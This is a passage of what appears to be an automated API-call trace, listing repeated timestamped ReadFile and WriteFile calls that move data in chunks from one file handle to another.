nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.906] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x123, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.909] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.913] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.915] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.916] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x88, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.921] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.923] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x213, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.931] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.931] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.932] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.938] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x176, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.947] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x213, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.950] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, 